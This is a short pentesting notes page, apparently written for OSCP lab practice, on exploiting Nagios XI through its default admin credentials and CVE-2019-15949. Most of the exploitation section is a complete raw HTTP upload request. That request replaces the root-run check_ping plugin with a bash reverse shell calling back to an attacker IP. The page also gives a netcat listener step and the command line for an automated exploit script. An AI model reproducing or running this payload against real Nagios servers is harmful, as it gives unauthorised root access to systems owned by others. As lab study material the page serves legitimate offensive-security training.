Skip to content

Pentesting Nagios

Nagios XI is a popular and widely used commercial monitoring solution for IT infrastructure and network monitoring. It is the commercial version of the open-source Nagios Core monitoring platform, and provides added features to simplify the process of managing complex IT environments.

Login is usually at: http://$targed/nagiosxi/login.php

Default password

1
nagiosadmin:admin

Version

Once logged, check the version

![[nagiosversion.png]]

Nagios has well-known vulnerabilities associated to some versions.

Well known CVEs

CVE-2019-15949

Source: https://www.exploit-db.com/exploits/52138

Exploited in the machine OSCP Monitoring

Manual exploitation

The plugin check_ping is running with root permissions when triggering this endpoint: http://192.168.188.136/nagiosxi/includes/components/profile/profile.php?cmd=download

Based on that, we can overwrite it with a reverse shell by uploading:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
POST /nagiosxi/admin/monitoringplugins.php HTTP/1.1
Host: 192.168.188.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10820201625104408392403571266
Content-Length: 706
Referer: http://192.168.188.136/nagiosxi/admin/monitoringplugins.php
Origin: http://192.168.188.136
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Connection: keep-alive
Cookie: nagiosxi=ddb4n235m0cumv1bog5dqd29r3

-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="upload"

1
-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="nsp"

b81aa9c5366779e92ea0800832c4ce99ff6acee42a8a2a33e2f52ef7bbd1b98e
-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="MAX_FILE_SIZE"

20000000
-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="uploadedfile"; filename="check_ping"
Content-Type: application/octet-stream

bash -c 'bash -i >& /dev/tcp/192.168.45.201/3333 0>&1'
-----------------------------10820201625104408392403571266--

Previously, set the netcat listener at 3333 in your kali.

Automatic exploitation

Run the exploit with:

1
python3 exploit.py -t http://192.168.188.136/ -b /nagiosxi/ -u "nagiosadmin" -p "admin" -lh 192.168.45.201 -lp 4444 -k
Last update: 2025-12-14
Created: December 14, 2025 10:44:38